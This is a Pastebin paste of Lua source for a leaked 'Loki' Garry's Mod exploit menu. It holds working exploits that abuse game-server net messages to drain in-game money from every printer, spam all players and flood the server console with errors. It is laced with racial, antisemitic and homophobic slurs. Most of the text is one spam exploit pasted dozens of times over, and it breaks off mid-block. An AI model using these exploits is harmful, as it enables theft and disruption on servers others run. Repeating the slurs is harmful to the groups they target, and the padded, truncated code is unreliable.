Advertisement
Guest User

loki v2 menu leaked but for real now

a guest
Nov 14th, 2019
214
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 370.15 KB | None | 0 0
  1. Leaked by web so i can buy isus a headset
  2.  
  3.  
  4. local LOKI = {}
  5. LOKI.memory = {}
  6.  
  7. local grad = Material( "gui/gradient" )
  8. local upgrad = Material( "gui/gradient_up" )
  9. local downgrad = Material( "gui/gradient_down" )
  10.  
  11. function LOKI.ValidNetString( str )
  12. local status, error = pcall( net.Start, str )
  13. return status
  14. end
  15.  
  16. local ctext = chat.AddText
  17. function LOKI.ChatText( str )
  18. ctext( Color( 220, 220, 220 ), "[Loki] "..str )
  19. end
  20.  
  21. LOKI.sploits = {}
  22. local severitycols = {
  23. [1] = Color( 80, 80, 200 ),
  24. [2] = Color( 80, 200, 80 ),
  25. [3] = Color( 250, 200, 50 ),
  26. [4] = Color( 250, 50, 50 ),
  27. }
  28.  
  29. function LOKI.AddExploit( name, tab )
  30. if !isstring( name ) then print("U FUCKED UP A SPLOIT RETARD") return end
  31. if !istable( tab ) then print("U FUCKED UP A SPLOIT RETARD") return end
  32. LOKI.sploits[name] = tab
  33. end
  34.  
  35. function LOKI.IsStored( addr )
  36. return LOKI.memory[addr] != nil
  37. end
  38.  
  39. function LOKI.GetStored( addr, fallback )
  40. if fallback and LOKI.memory[addr] == nil then return fallback end
  41. return LOKI.memory[addr]
  42. end
  43.  
  44. function LOKI.Store( addr, val )
  45. LOKI.memory[addr] = val
  46. end
  47.  
  48. function LOKI.GetAllStored()
  49. return LOKI.memory
  50. end
  51.  
  52. function LOKI.LoadConfig()
  53. local f = file.Read( "acebot/loki.dat", "DATA" )
  54. if !f then LOKI.ChatText( "YOU HAVEN'T SAVED A CONFIG FUCKING IDIOT" ) end
  55. local raw = util.Decompress( f )
  56. local garbage = util.JSONToTable( raw )
  57. LOKI.memory = garbage
  58. end
  59.  
  60. function LOKI.SaveConfig()
  61. local myturds = util.TableToJSON( LOKI.memory )
  62. if !myturds then return end
  63. local cumpressed = util.Compress( myturds )
  64. file.Write( "acebot/loki.dat", cumpressed )
  65. end
  66.  
  67. ---------------------------------------------------------------------------------------------------------------------
  68.  
  69. /*
  70. LOKI.AddExploit( "Test Sploit", {
  71. desc = "Does nothing, used for menu testing",
  72. severity = 1,
  73. scan = function() return true end,
  74. functions = {
  75. { typ = "string", name = "Enter a gay cunt", default = "you", addr = "teststring" },
  76. { typ = "func", name = "Fist his holes", func = function() print( LOKI.GetStored( "teststring", "" ).." is such a fucking gay nigger omg" ) end, },
  77. },
  78. } )
  79. */
  80.  
  81.  
  82. LOKI.AddExploit( "Customizable Printers Money Stealer", {
  83. desc = "Instantly jew all money from every printer on the server",
  84. severity = 3,
  85. scan = function() return LOKI.ValidNetString( "SyncPrinterButtons76561198056171650" ) end,
  86. functions = {
  87. { typ = "func", name = "Gimme some shekels", func = function()
  88. if !timer.Exists( "loki_shekels" ) then
  89. LOKI.ChatText( "Starting shekel grabber" )
  90. timer.Create( "loki_shekels", 0.1, 0, function()
  91. for k, v in pairs(ents.GetAll()) do
  92. if( v:GetClass():find("print") ) then
  93. net.Start( "SyncPrinterButtons76561198056171650" )
  94. net.WriteEntity(v)
  95. net.WriteUInt(2, 4)
  96. net.SendToServer()
  97. end
  98. end
  99. end)
  100. else
  101. timer.Remove( "loki_shekels" )
  102. LOKI.ChatText( "Stopping shekel grabber" )
  103. end
  104. end, },
  105. },
  106. } )
  107.  
  108. LOKI.AddExploit( "ULX Friends Spam", {
  109. desc = "Spams everybody on the server with a message",
  110. severity = 1,
  111. scan = function() return (LOKI.ValidNetString( "sendtable" ) and ulx and ulx.friends ) end,
  112. functions = {
  113. { typ = "string", name = "Enter a message", default = "GET ODIUM.PRO", addr = "fr_spamstring" },
  114. { typ = "func", name = "Big Spams", func = function()
  115. if !timer.Exists( "bigspams" ) then
  116. LOKI.ChatText( "Starting big spams" )
  117. timer.Create( "bigspams", 0.5, 0, function()
  118. for k, v in pairs( player.GetAll() ) do
  119. local buyit = {}
  120. for i = 1, 15 do
  121. table.insert( buyit, LOKI.GetStored( "fr_spamstring", "GET ODIUM.PRO" ) )
  122. end
  123. net.Start( "sendtable" )
  124. net.WriteEntity( v )
  125. net.WriteTable( buyit )
  126. net.SendToServer()
  127. end
  128. end)
  129. else
  130. timer.Remove( "bigspams" )
  131. LOKI.ChatText( "Stopping big spams" )
  132. end
  133. end, },
  134. },
  135. } )
  136.  
  137. LOKI.AddExploit( "Console Error Spammer", {
  138. desc = "Fuck up the server rcon with massed errors (untracable)",
  139. severity = 1,
  140. scan = function() return LOKI.ValidNetString( "steamid2" ) end,
  141. functions = {
  142. { typ = "func", name = "Big Spams", func = function()
  143. if !timer.Exists( "loki_errorz" ) then
  144. LOKI.ChatText( "Starting error spam" )
  145. timer.Create( "loki_errorz", 0.1, 0, function()
  146. net.Start( "steamid2" )
  147. net.WriteString( "FAGGOT" )
  148. net.SendToServer()
  149. end)
  150. else
  151. timer.Remove( "loki_errorz" )
  152. LOKI.ChatText( "Stopping error spam" )
  153. end
  154. end, },
  155. },
  156. } )
  157.  
  158. LOKI.AddExploit( "Dude Weed Lmao", {
  159. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  160. severity = 1,
  161. scan = function() return LOKI.ValidNetString( "weed" ) end,
  162. functions = {
  163. { typ = "func", name = "Big Weed", func = function()
  164. if !timer.Exists( "loki_bonghit" ) then
  165. timer.Create( "loki_bonghit", 0.1, 0, function()
  166. net.Start( "weed" )
  167. net.WriteString( "DUDE" )
  168. net.SendToServer()
  169. end)
  170. else
  171. timer.Remove( "loki_bonghit" )
  172. end
  173. end, },
  174. },
  175. } )
  176.  
  177. LOKI.AddExploit( "Dude Weed Lmao", {
  178. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  179. severity = 1,
  180. scan = function() return LOKI.ValidNetString( "weed" ) end,
  181. functions = {
  182. { typ = "func", name = "Big Weed", func = function()
  183. if !timer.Exists( "loki_bonghit" ) then
  184. timer.Create( "loki_bonghit", 0.1, 0, function()
  185. net.Start( "weed" )
  186. net.WriteString( "DUDE" )
  187. net.SendToServer()
  188. end)
  189. else
  190. timer.Remove( "loki_bonghit" )
  191. end
  192. end, },
  193. },
  194. } )
  195.  
  196. LOKI.AddExploit( "Dude Weed Lmao", {
  197. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  198. severity = 1,
  199. scan = function() return LOKI.ValidNetString( "weed" ) end,
  200. functions = {
  201. { typ = "func", name = "Big Weed", func = function()
  202. if !timer.Exists( "loki_bonghit" ) then
  203. timer.Create( "loki_bonghit", 0.1, 0, function()
  204. net.Start( "weed" )
  205. net.WriteString( "DUDE" )
  206. net.SendToServer()
  207. end)
  208. else
  209. timer.Remove( "loki_bonghit" )
  210. end
  211. end, },
  212. },
  213. } )
  214.  
  215. LOKI.AddExploit( "Dude Weed Lmao", {
  216. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  217. severity = 1,
  218. scan = function() return LOKI.ValidNetString( "weed" ) end,
  219. functions = {
  220. { typ = "func", name = "Big Weed", func = function()
  221. if !timer.Exists( "loki_bonghit" ) then
  222. timer.Create( "loki_bonghit", 0.1, 0, function()
  223. net.Start( "weed" )
  224. net.WriteString( "DUDE" )
  225. net.SendToServer()
  226. end)
  227. else
  228. timer.Remove( "loki_bonghit" )
  229. end
  230. end, },
  231. },
  232. } )
  233.  
  234. LOKI.AddExploit( "Dude Weed Lmao", {
  235. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  236. severity = 1,
  237. scan = function() return LOKI.ValidNetString( "weed" ) end,
  238. functions = {
  239. { typ = "func", name = "Big Weed", func = function()
  240. if !timer.Exists( "loki_bonghit" ) then
  241. timer.Create( "loki_bonghit", 0.1, 0, function()
  242. net.Start( "weed" )
  243. net.WriteString( "DUDE" )
  244. net.SendToServer()
  245. end)
  246. else
  247. timer.Remove( "loki_bonghit" )
  248. end
  249. end, },
  250. },
  251. } )
  252.  
  253. LOKI.AddExploit( "Dude Weed Lmao", {
  254. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  255. severity = 1,
  256. scan = function() return LOKI.ValidNetString( "weed" ) end,
  257. functions = {
  258. { typ = "func", name = "Big Weed", func = function()
  259. if !timer.Exists( "loki_bonghit" ) then
  260. timer.Create( "loki_bonghit", 0.1, 0, function()
  261. net.Start( "weed" )
  262. net.WriteString( "DUDE" )
  263. net.SendToServer()
  264. end)
  265. else
  266. timer.Remove( "loki_bonghit" )
  267. end
  268. end, },
  269. },
  270. } )
  271.  
  272. LOKI.AddExploit( "Dude Weed Lmao", {
  273. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  274. severity = 1,
  275. scan = function() return LOKI.ValidNetString( "weed" ) end,
  276. functions = {
  277. { typ = "func", name = "Big Weed", func = function()
  278. if !timer.Exists( "loki_bonghit" ) then
  279. timer.Create( "loki_bonghit", 0.1, 0, function()
  280. net.Start( "weed" )
  281. net.WriteString( "DUDE" )
  282. net.SendToServer()
  283. end)
  284. else
  285. timer.Remove( "loki_bonghit" )
  286. end
  287. end, },
  288. },
  289. } )
  290.  
  291. LOKI.AddExploit( "Dude Weed Lmao", {
  292. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  293. severity = 1,
  294. scan = function() return LOKI.ValidNetString( "weed" ) end,
  295. functions = {
  296. { typ = "func", name = "Big Weed", func = function()
  297. if !timer.Exists( "loki_bonghit" ) then
  298. timer.Create( "loki_bonghit", 0.1, 0, function()
  299. net.Start( "weed" )
  300. net.WriteString( "DUDE" )
  301. net.SendToServer()
  302. end)
  303. else
  304. timer.Remove( "loki_bonghit" )
  305. end
  306. end, },
  307. },
  308. } )
  309.  
  310. LOKI.AddExploit( "Dude Weed Lmao", {
  311. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  312. severity = 1,
  313. scan = function() return LOKI.ValidNetString( "weed" ) end,
  314. functions = {
  315. { typ = "func", name = "Big Weed", func = function()
  316. if !timer.Exists( "loki_bonghit" ) then
  317. timer.Create( "loki_bonghit", 0.1, 0, function()
  318. net.Start( "weed" )
  319. net.WriteString( "DUDE" )
  320. net.SendToServer()
  321. end)
  322. else
  323. timer.Remove( "loki_bonghit" )
  324. end
  325. end, },
  326. },
  327. } )
  328.  
  329. LOKI.AddExploit( "Dude Weed Lmao", {
  330. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  331. severity = 1,
  332. scan = function() return LOKI.ValidNetString( "weed" ) end,
  333. functions = {
  334. { typ = "func", name = "Big Weed", func = function()
  335. if !timer.Exists( "loki_bonghit" ) then
  336. timer.Create( "loki_bonghit", 0.1, 0, function()
  337. net.Start( "weed" )
  338. net.WriteString( "DUDE" )
  339. net.SendToServer()
  340. end)
  341. else
  342. timer.Remove( "loki_bonghit" )
  343. end
  344. end, },
  345. },
  346. } )
  347.  
  348. LOKI.AddExploit( "Dude Weed Lmao", {
  349. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  350. severity = 1,
  351. scan = function() return LOKI.ValidNetString( "weed" ) end,
  352. functions = {
  353. { typ = "func", name = "Big Weed", func = function()
  354. if !timer.Exists( "loki_bonghit" ) then
  355. timer.Create( "loki_bonghit", 0.1, 0, function()
  356. net.Start( "weed" )
  357. net.WriteString( "DUDE" )
  358. net.SendToServer()
  359. end)
  360. else
  361. timer.Remove( "loki_bonghit" )
  362. end
  363. end, },
  364. },
  365. } )
  366.  
  367. LOKI.AddExploit( "Dude Weed Lmao", {
  368. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  369. severity = 1,
  370. scan = function() return LOKI.ValidNetString( "weed" ) end,
  371. functions = {
  372. { typ = "func", name = "Big Weed", func = function()
  373. if !timer.Exists( "loki_bonghit" ) then
  374. timer.Create( "loki_bonghit", 0.1, 0, function()
  375. net.Start( "weed" )
  376. net.WriteString( "DUDE" )
  377. net.SendToServer()
  378. end)
  379. else
  380. timer.Remove( "loki_bonghit" )
  381. end
  382. end, },
  383. },
  384. } )
  385.  
  386. LOKI.AddExploit( "Dude Weed Lmao", {
  387. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  388. severity = 1,
  389. scan = function() return LOKI.ValidNetString( "weed" ) end,
  390. functions = {
  391. { typ = "func", name = "Big Weed", func = function()
  392. if !timer.Exists( "loki_bonghit" ) then
  393. timer.Create( "loki_bonghit", 0.1, 0, function()
  394. net.Start( "weed" )
  395. net.WriteString( "DUDE" )
  396. net.SendToServer()
  397. end)
  398. else
  399. timer.Remove( "loki_bonghit" )
  400. end
  401. end, },
  402. },
  403. } )
  404.  
  405. LOKI.AddExploit( "Dude Weed Lmao", {
  406. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  407. severity = 1,
  408. scan = function() return LOKI.ValidNetString( "weed" ) end,
  409. functions = {
  410. { typ = "func", name = "Big Weed", func = function()
  411. if !timer.Exists( "loki_bonghit" ) then
  412. timer.Create( "loki_bonghit", 0.1, 0, function()
  413. net.Start( "weed" )
  414. net.WriteString( "DUDE" )
  415. net.SendToServer()
  416. end)
  417. else
  418. timer.Remove( "loki_bonghit" )
  419. end
  420. end, },
  421. },
  422. } )
  423.  
  424. LOKI.AddExploit( "Dude Weed Lmao", {
  425. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  426. severity = 1,
  427. scan = function() return LOKI.ValidNetString( "weed" ) end,
  428. functions = {
  429. { typ = "func", name = "Big Weed", func = function()
  430. if !timer.Exists( "loki_bonghit" ) then
  431. timer.Create( "loki_bonghit", 0.1, 0, function()
  432. net.Start( "weed" )
  433. net.WriteString( "DUDE" )
  434. net.SendToServer()
  435. end)
  436. else
  437. timer.Remove( "loki_bonghit" )
  438. end
  439. end, },
  440. },
  441. } )
  442.  
  443. LOKI.AddExploit( "Dude Weed Lmao", {
  444. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  445. severity = 1,
  446. scan = function() return LOKI.ValidNetString( "weed" ) end,
  447. functions = {
  448. { typ = "func", name = "Big Weed", func = function()
  449. if !timer.Exists( "loki_bonghit" ) then
  450. timer.Create( "loki_bonghit", 0.1, 0, function()
  451. net.Start( "weed" )
  452. net.WriteString( "DUDE" )
  453. net.SendToServer()
  454. end)
  455. else
  456. timer.Remove( "loki_bonghit" )
  457. end
  458. end, },
  459. },
  460. } )
  461.  
  462. LOKI.AddExploit( "Dude Weed Lmao", {
  463. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  464. severity = 1,
  465. scan = function() return LOKI.ValidNetString( "weed" ) end,
  466. functions = {
  467. { typ = "func", name = "Big Weed", func = function()
  468. if !timer.Exists( "loki_bonghit" ) then
  469. timer.Create( "loki_bonghit", 0.1, 0, function()
  470. net.Start( "weed" )
  471. net.WriteString( "DUDE" )
  472. net.SendToServer()
  473. end)
  474. else
  475. timer.Remove( "loki_bonghit" )
  476. end
  477. end, },
  478. },
  479. } )
  480.  
  481. LOKI.AddExploit( "Dude Weed Lmao", {
  482. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  483. severity = 1,
  484. scan = function() return LOKI.ValidNetString( "weed" ) end,
  485. functions = {
  486. { typ = "func", name = "Big Weed", func = function()
  487. if !timer.Exists( "loki_bonghit" ) then
  488. timer.Create( "loki_bonghit", 0.1, 0, function()
  489. net.Start( "weed" )
  490. net.WriteString( "DUDE" )
  491. net.SendToServer()
  492. end)
  493. else
  494. timer.Remove( "loki_bonghit" )
  495. end
  496. end, },
  497. },
  498. } )
  499.  
  500. LOKI.AddExploit( "Dude Weed Lmao", {
  501. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  502. severity = 1,
  503. scan = function() return LOKI.ValidNetString( "weed" ) end,
  504. functions = {
  505. { typ = "func", name = "Big Weed", func = function()
  506. if !timer.Exists( "loki_bonghit" ) then
  507. timer.Create( "loki_bonghit", 0.1, 0, function()
  508. net.Start( "weed" )
  509. net.WriteString( "DUDE" )
  510. net.SendToServer()
  511. end)
  512. else
  513. timer.Remove( "loki_bonghit" )
  514. end
  515. end, },
  516. },
  517. } )
  518.  
  519. LOKI.AddExploit( "Dude Weed Lmao", {
  520. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  521. severity = 1,
  522. scan = function() return LOKI.ValidNetString( "weed" ) end,
  523. functions = {
  524. { typ = "func", name = "Big Weed", func = function()
  525. if !timer.Exists( "loki_bonghit" ) then
  526. timer.Create( "loki_bonghit", 0.1, 0, function()
  527. net.Start( "weed" )
  528. net.WriteString( "DUDE" )
  529. net.SendToServer()
  530. end)
  531. else
  532. timer.Remove( "loki_bonghit" )
  533. end
  534. end, },
  535. },
  536. } )
  537.  
  538. LOKI.AddExploit( "Dude Weed Lmao", {
  539. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  540. severity = 1,
  541. scan = function() return LOKI.ValidNetString( "weed" ) end,
  542. functions = {
  543. { typ = "func", name = "Big Weed", func = function()
  544. if !timer.Exists( "loki_bonghit" ) then
  545. timer.Create( "loki_bonghit", 0.1, 0, function()
  546. net.Start( "weed" )
  547. net.WriteString( "DUDE" )
  548. net.SendToServer()
  549. end)
  550. else
  551. timer.Remove( "loki_bonghit" )
  552. end
  553. end, },
  554. },
  555. } )
  556.  
  557. LOKI.AddExploit( "Dude Weed Lmao", {
  558. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  559. severity = 1,
  560. scan = function() return LOKI.ValidNetString( "weed" ) end,
  561. functions = {
  562. { typ = "func", name = "Big Weed", func = function()
  563. if !timer.Exists( "loki_bonghit" ) then
  564. timer.Create( "loki_bonghit", 0.1, 0, function()
  565. net.Start( "weed" )
  566. net.WriteString( "DUDE" )
  567. net.SendToServer()
  568. end)
  569. else
  570. timer.Remove( "loki_bonghit" )
  571. end
  572. end, },
  573. },
  574. } )
  575.  
  576. LOKI.AddExploit( "Dude Weed Lmao", {
  577. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  578. severity = 1,
  579. scan = function() return LOKI.ValidNetString( "weed" ) end,
  580. functions = {
  581. { typ = "func", name = "Big Weed", func = function()
  582. if !timer.Exists( "loki_bonghit" ) then
  583. timer.Create( "loki_bonghit", 0.1, 0, function()
  584. net.Start( "weed" )
  585. net.WriteString( "DUDE" )
  586. net.SendToServer()
  587. end)
  588. else
  589. timer.Remove( "loki_bonghit" )
  590. end
  591. end, },
  592. },
  593. } )
  594.  
  595. LOKI.AddExploit( "Dude Weed Lmao", {
  596. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  597. severity = 1,
  598. scan = function() return LOKI.ValidNetString( "weed" ) end,
  599. functions = {
  600. { typ = "func", name = "Big Weed", func = function()
  601. if !timer.Exists( "loki_bonghit" ) then
  602. timer.Create( "loki_bonghit", 0.1, 0, function()
  603. net.Start( "weed" )
  604. net.WriteString( "DUDE" )
  605. net.SendToServer()
  606. end)
  607. else
  608. timer.Remove( "loki_bonghit" )
  609. end
  610. end, },
  611. },
  612. } )
  613.  
  614. LOKI.AddExploit( "Dude Weed Lmao", {
  615. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  616. severity = 1,
  617. scan = function() return LOKI.ValidNetString( "weed" ) end,
  618. functions = {
  619. { typ = "func", name = "Big Weed", func = function()
  620. if !timer.Exists( "loki_bonghit" ) then
  621. timer.Create( "loki_bonghit", 0.1, 0, function()
  622. net.Start( "weed" )
  623. net.WriteString( "DUDE" )
  624. net.SendToServer()
  625. end)
  626. else
  627. timer.Remove( "loki_bonghit" )
  628. end
  629. end, },
  630. },
  631. } )
  632.  
  633. LOKI.AddExploit( "Dude Weed Lmao", {
  634. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  635. severity = 1,
  636. scan = function() return LOKI.ValidNetString( "weed" ) end,
  637. functions = {
  638. { typ = "func", name = "Big Weed", func = function()
  639. if !timer.Exists( "loki_bonghit" ) then
  640. timer.Create( "loki_bonghit", 0.1, 0, function()
  641. net.Start( "weed" )
  642. net.WriteString( "DUDE" )
  643. net.SendToServer()
  644. end)
  645. else
  646. timer.Remove( "loki_bonghit" )
  647. end
  648. end, },
  649. },
  650. } )
  651.  
  652. LOKI.AddExploit( "Dude Weed Lmao", {
  653. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  654. severity = 1,
  655. scan = function() return LOKI.ValidNetString( "weed" ) end,
  656. functions = {
  657. { typ = "func", name = "Big Weed", func = function()
  658. if !timer.Exists( "loki_bonghit" ) then
  659. timer.Create( "loki_bonghit", 0.1, 0, function()
  660. net.Start( "weed" )
  661. net.WriteString( "DUDE" )
  662. net.SendToServer()
  663. end)
  664. else
  665. timer.Remove( "loki_bonghit" )
  666. end
  667. end, },
  668. },
  669. } )
  670.  
  671. LOKI.AddExploit( "Dude Weed Lmao", {
  672. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  673. severity = 1,
  674. scan = function() return LOKI.ValidNetString( "weed" ) end,
  675. functions = {
  676. { typ = "func", name = "Big Weed", func = function()
  677. if !timer.Exists( "loki_bonghit" ) then
  678. timer.Create( "loki_bonghit", 0.1, 0, function()
  679. net.Start( "weed" )
  680. net.WriteString( "DUDE" )
  681. net.SendToServer()
  682. end)
  683. else
  684. timer.Remove( "loki_bonghit" )
  685. end
  686. end, },
  687. },
  688. } )
  689.  
  690. LOKI.AddExploit( "Dude Weed Lmao", {
  691. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  692. severity = 1,
  693. scan = function() return LOKI.ValidNetString( "weed" ) end,
  694. functions = {
  695. { typ = "func", name = "Big Weed", func = function()
  696. if !timer.Exists( "loki_bonghit" ) then
  697. timer.Create( "loki_bonghit", 0.1, 0, function()
  698. net.Start( "weed" )
  699. net.WriteString( "DUDE" )
  700. net.SendToServer()
  701. end)
  702. else
  703. timer.Remove( "loki_bonghit" )
  704. end
  705. end, },
  706. },
  707. } )
  708.  
  709. LOKI.AddExploit( "Dude Weed Lmao", {
  710. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  711. severity = 1,
  712. scan = function() return LOKI.ValidNetString( "weed" ) end,
  713. functions = {
  714. { typ = "func", name = "Big Weed", func = function()
  715. if !timer.Exists( "loki_bonghit" ) then
  716. timer.Create( "loki_bonghit", 0.1, 0, function()
  717. net.Start( "weed" )
  718. net.WriteString( "DUDE" )
  719. net.SendToServer()
  720. end)
  721. else
  722. timer.Remove( "loki_bonghit" )
  723. end
  724. end, },
  725. },
  726. } )
  727.  
  728. LOKI.AddExploit( "Dude Weed Lmao", {
  729. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  730. severity = 1,
  731. scan = function() return LOKI.ValidNetString( "weed" ) end,
  732. functions = {
  733. { typ = "func", name = "Big Weed", func = function()
  734. if !timer.Exists( "loki_bonghit" ) then
  735. timer.Create( "loki_bonghit", 0.1, 0, function()
  736. net.Start( "weed" )
  737. net.WriteString( "DUDE" )
  738. net.SendToServer()
  739. end)
  740. else
  741. timer.Remove( "loki_bonghit" )
  742. end
  743. end, },
  744. },
  745. } )
  746.  
  747. LOKI.AddExploit( "Dude Weed Lmao", {
  748. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  749. severity = 1,
  750. scan = function() return LOKI.ValidNetString( "weed" ) end,
  751. functions = {
  752. { typ = "func", name = "Big Weed", func = function()
  753. if !timer.Exists( "loki_bonghit" ) then
  754. timer.Create( "loki_bonghit", 0.1, 0, function()
  755. net.Start( "weed" )
  756. net.WriteString( "DUDE" )
  757. net.SendToServer()
  758. end)
  759. else
  760. timer.Remove( "loki_bonghit" )
  761. end
  762. end, },
  763. },
  764. } )
  765.  
  766. LOKI.AddExploit( "Dude Weed Lmao", {
  767. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  768. severity = 1,
  769. scan = function() return LOKI.ValidNetString( "weed" ) end,
  770. functions = {
  771. { typ = "func", name = "Big Weed", func = function()
  772. if !timer.Exists( "loki_bonghit" ) then
  773. timer.Create( "loki_bonghit", 0.1, 0, function()
  774. net.Start( "weed" )
  775. net.WriteString( "DUDE" )
  776. net.SendToServer()
  777. end)
  778. else
  779. timer.Remove( "loki_bonghit" )
  780. end
  781. end, },
  782. },
  783. } )
  784.  
  785. LOKI.AddExploit( "Dude Weed Lmao", {
  786. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  787. severity = 1,
  788. scan = function() return LOKI.ValidNetString( "weed" ) end,
  789. functions = {
  790. { typ = "func", name = "Big Weed", func = function()
  791. if !timer.Exists( "loki_bonghit" ) then
  792. timer.Create( "loki_bonghit", 0.1, 0, function()
  793. net.Start( "weed" )
  794. net.WriteString( "DUDE" )
  795. net.SendToServer()
  796. end)
  797. else
  798. timer.Remove( "loki_bonghit" )
  799. end
  800. end, },
  801. },
  802. } )
  803.  
  804. LOKI.AddExploit( "Dude Weed Lmao", {
  805. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  806. severity = 1,
  807. scan = function() return LOKI.ValidNetString( "weed" ) end,
  808. functions = {
  809. { typ = "func", name = "Big Weed", func = function()
  810. if !timer.Exists( "loki_bonghit" ) then
  811. timer.Create( "loki_bonghit", 0.1, 0, function()
  812. net.Start( "weed" )
  813. net.WriteString( "DUDE" )
  814. net.SendToServer()
  815. end)
  816. else
  817. timer.Remove( "loki_bonghit" )
  818. end
  819. end, },
  820. },
  821. } )
  822.  
  823. LOKI.AddExploit( "Dude Weed Lmao", {
  824. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  825. severity = 1,
  826. scan = function() return LOKI.ValidNetString( "weed" ) end,
  827. functions = {
  828. { typ = "func", name = "Big Weed", func = function()
  829. if !timer.Exists( "loki_bonghit" ) then
  830. timer.Create( "loki_bonghit", 0.1, 0, function()
  831. net.Start( "weed" )
  832. net.WriteString( "DUDE" )
  833. net.SendToServer()
  834. end)
  835. else
  836. timer.Remove( "loki_bonghit" )
  837. end
  838. end, },
  839. },
  840. } )
  841.  
  842. LOKI.AddExploit( "Dude Weed Lmao", {
  843. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  844. severity = 1,
  845. scan = function() return LOKI.ValidNetString( "weed" ) end,
  846. functions = {
  847. { typ = "func", name = "Big Weed", func = function()
  848. if !timer.Exists( "loki_bonghit" ) then
  849. timer.Create( "loki_bonghit", 0.1, 0, function()
  850. net.Start( "weed" )
  851. net.WriteString( "DUDE" )
  852. net.SendToServer()
  853. end)
  854. else
  855. timer.Remove( "loki_bonghit" )
  856. end
  857. end, },
  858. },
  859. } )
  860.  
  861. LOKI.AddExploit( "Dude Weed Lmao", {
  862. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  863. severity = 1,
  864. scan = function() return LOKI.ValidNetString( "weed" ) end,
  865. functions = {
  866. { typ = "func", name = "Big Weed", func = function()
  867. if !timer.Exists( "loki_bonghit" ) then
  868. timer.Create( "loki_bonghit", 0.1, 0, function()
  869. net.Start( "weed" )
  870. net.WriteString( "DUDE" )
  871. net.SendToServer()
  872. end)
  873. else
  874. timer.Remove( "loki_bonghit" )
  875. end
  876. end, },
  877. },
  878. } )
  879.  
  880. LOKI.AddExploit( "Dude Weed Lmao", {
  881. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  882. severity = 1,
  883. scan = function() return LOKI.ValidNetString( "weed" ) end,
  884. functions = {
  885. { typ = "func", name = "Big Weed", func = function()
  886. if !timer.Exists( "loki_bonghit" ) then
  887. timer.Create( "loki_bonghit", 0.1, 0, function()
  888. net.Start( "weed" )
  889. net.WriteString( "DUDE" )
  890. net.SendToServer()
  891. end)
  892. else
  893. timer.Remove( "loki_bonghit" )
  894. end
  895. end, },
  896. },
  897. } )
  898.  
  899. LOKI.AddExploit( "Dude Weed Lmao", {
  900. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  901. severity = 1,
  902. scan = function() return LOKI.ValidNetString( "weed" ) end,
  903. functions = {
  904. { typ = "func", name = "Big Weed", func = function()
  905. if !timer.Exists( "loki_bonghit" ) then
  906. timer.Create( "loki_bonghit", 0.1, 0, function()
  907. net.Start( "weed" )
  908. net.WriteString( "DUDE" )
  909. net.SendToServer()
  910. end)
  911. else
  912. timer.Remove( "loki_bonghit" )
  913. end
  914. end, },
  915. },
  916. } )
  917.  
  918. LOKI.AddExploit( "Dude Weed Lmao", {
  919. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  920. severity = 1,
  921. scan = function() return LOKI.ValidNetString( "weed" ) end,
  922. functions = {
  923. { typ = "func", name = "Big Weed", func = function()
  924. if !timer.Exists( "loki_bonghit" ) then
  925. timer.Create( "loki_bonghit", 0.1, 0, function()
  926. net.Start( "weed" )
  927. net.WriteString( "DUDE" )
  928. net.SendToServer()
  929. end)
  930. else
  931. timer.Remove( "loki_bonghit" )
  932. end
  933. end, },
  934. },
  935. } )
  936.  
  937. LOKI.AddExploit( "Dude Weed Lmao", {
  938. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  939. severity = 1,
  940. scan = function() return LOKI.ValidNetString( "weed" ) end,
  941. functions = {
  942. { typ = "func", name = "Big Weed", func = function()
  943. if !timer.Exists( "loki_bonghit" ) then
  944. timer.Create( "loki_bonghit", 0.1, 0, function()
  945. net.Start( "weed" )
  946. net.WriteString( "DUDE" )
  947. net.SendToServer()
  948. end)
  949. else
  950. timer.Remove( "loki_bonghit" )
  951. end
  952. end, },
  953. },
  954. } )
  955.  
  956. LOKI.AddExploit( "Dude Weed Lmao", {
  957. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  958. severity = 1,
  959. scan = function() return LOKI.ValidNetString( "weed" ) end,
  960. functions = {
  961. { typ = "func", name = "Big Weed", func = function()
  962. if !timer.Exists( "loki_bonghit" ) then
  963. timer.Create( "loki_bonghit", 0.1, 0, function()
  964. net.Start( "weed" )
  965. net.WriteString( "DUDE" )
  966. net.SendToServer()
  967. end)
  968. else
  969. timer.Remove( "loki_bonghit" )
